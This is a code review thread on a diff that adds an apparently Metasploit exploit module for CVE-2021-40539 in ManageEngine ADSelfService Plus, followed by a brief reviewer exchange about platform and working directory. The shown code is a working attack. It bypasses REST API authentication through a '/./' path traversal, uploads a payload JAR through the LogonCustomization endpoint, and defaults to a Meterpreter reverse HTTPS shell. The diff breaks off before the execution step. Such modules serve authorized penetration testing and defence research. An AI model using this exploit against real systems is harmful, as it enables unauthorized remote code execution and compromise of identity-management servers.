modules/exploits/windows/http/manageengine_adselfservice_plus_cve_2021_40539.rb

```diff
@@ -0,0 +1,146 @@
+          ['URL', 'https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis'],
+          ['URL', 'https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html'],
+          ['URL', 'https://github.com/synacktiv/CVE-2021-40539/blob/main/exploit.py']
+        ],
+        'DisclosureDate' => '2021-09-07',
+        'License' => MSF_LICENSE,
+        'Platform' => 'java',
+        'Arch' => ARCH_JAVA,
+        'Privileged' => false, # true if ADSelfService Plus is run as a service
+        'Targets' => [
+          ['Java Dropper', {}]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 8888,
+          'PAYLOAD' => 'java/meterpreter/reverse_https'
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Path traversal for auth bypass', '/./'])
+    ])
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'),
+      'vars_post' => {
+        'methodToCall' => 'previewMobLogo'
+      }
+    )
+
+    unless res
+      return CheckCode::Unknown('Target failed to respond to check.')
+    end
+
+    unless res.code == 200 && res.body.include?('/temp/tempMobPreview.jpeg')
+      return CheckCode::Safe('Failed to bypass REST API authentication.')
+    end
+
+    CheckCode::Vulnerable('Successfully bypassed REST API authentication.')
+  end
+
+  def exploit
+    upload_payload_jar
+    execute_payload_jar
+  end
+
+  def upload_payload_jar
+    print_status("Uploading payload JAR: #{jar_filename}")
+
+    jar = payload.encoded_jar
+    jar.add_file("#{class_name}.class", constructor_class) # Hack, tbh
+
+    form = Rex::MIME::Message.new
+    form.add_part('unspecified', nil, nil, 'form-data; name="methodToCall"')
+    form.add_part('yas', nil, nil, 'form-data; name="Save"')
+    form.add_part('smartcard', nil, nil, 'form-data; name="form"')
+    form.add_part('Add', nil, nil, 'form-data; name="operation"')
+    form.add_part(jar.pack, 'application/java-archive', 'binary',
+                  %(form-data; name="CERTIFICATE_PATH"; filename="#{jar_filename}"))
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'),
+      'ctype' => "multipart/form-data; boundary=#{form.bound}",
+      'data' => form.to_s
+    )
+
+    unless res&.code == 404
+      fail_with(Failure::NotVulnerable, 'Failed to upload payload JAR')
+    end
+
+    # C:\ManageEngine\ADSelfService Plus\bin
+    register_file_for_cleanup(jar_filename)
```

Comment:
Is ManageEngine windows only?  Also how is path being determined here?

Reply:
Yes. Standard working directory.